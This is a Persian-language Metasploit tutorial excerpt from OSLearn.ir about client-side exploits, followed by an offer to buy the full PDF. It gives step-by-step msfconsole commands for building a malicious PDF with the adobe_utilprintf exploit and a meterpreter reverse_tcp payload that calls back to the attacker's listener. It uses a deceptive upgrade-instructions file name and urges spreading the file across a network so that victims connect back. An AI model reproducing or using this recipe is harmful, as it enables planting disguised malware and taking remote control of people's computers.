منبع اصلی نوشتار زیر در این لینک قرار دارد

آموزش متااسپلویت : Client Side Exploits

سلام دوستان . قسمت پنجم از آموزش های متااسپلویت را در پیش رو داریم . در این قسمت در مورد client side exploit صحبت خواهیم کرد و نحوه ی ساخت یک pdf آلوده را بررسی خواهیم کرد . هم چنین در ادامه نحوه دسترسی گرفتن و کار ها و اقدامات بعد از دسترسی گرفتن را هم بررسی می کنیم .

برای این منظور از اکسپلویت adobe_utilprintf به شکل زیر استفاده خواهیم کرد :

msf > use exploit/windows/fileformat/adobe_utilprintf

همانند دفعات گذشته از دستور زیر جهت دیدن قابلیت های این اکسپلویت استفاده خواهیم کرد :

msf exploit(adobe_utilprintf) > show options

در مرحله ی بعد یک نام برای فایل pdf خودمون انتخاب می کنیم :

msf exploit(adobe_utilprintf) > set FILENAME BestComputers-UpgradeInstructions.pdf

حال payload مورد نظر خودمون را انتخاب می کنیم :

msf exploit(adobe_utilprintf) > set PAYLOAD windows/meterpreter/reverse_tcp

و در نهایت آدرس آی دی سیستم خودمون :

msf exploit(adobe_utilprintf) > set LHOST 192.168.8.128

می توان پورتی را به صورت خاص مشخص کرد و از آن استفاده کرد اما به صورت پیش فرض از پورت 4444 استفاده خواهد شد . پس برای تعیین پورت به شکل زیر عمل می کنیم :

msf exploit(adobe_utilprintf) > set LPORT 4455

حال برای ساخت این فایل pdf کافیست عبارت exploit را تایپ و اجرا کنیم :

msf exploit(adobe_utilprintf) > exploit

نکته : فایل pdf ای که ساختیم در مسیر زیر ساخته شده است :

/root/.msf4/local/BestComputers-UpgradeInstructions.pdf

OSLearn.ir_2

فایل مورد نظر ساخته شد ! حالا کافیست این فایل به هر روشی در سطح شبکه منتشر شود تا قربانی ها به سیستم ما متصل شوند …

 

ادامه ی مقاله در فایل PDF ( نسخه ی کامل )

 

منبع : او اس لرن دات آی آر | http://OSLearn.ir

نویسنده : E2MA3N

قیمت : 1,500 تومان

برای دریافت فایل PDF به مبلغ 1,500 تومان کافیست بر روی خرید کلیک کرده تا به درگاه پارس پال هدایت شوید .

پس از پرداخت لینک دانلود فایل PDF تا دو روز برای شما فعال شده و ایمیلی با همین مضمون نیز برایتان ارسال می شود .

تاییده ی درگاه پارس پال در بالای صفحه سمت چپ قابل مشاهده و احراز هویت است .



برچسب ها : , , ,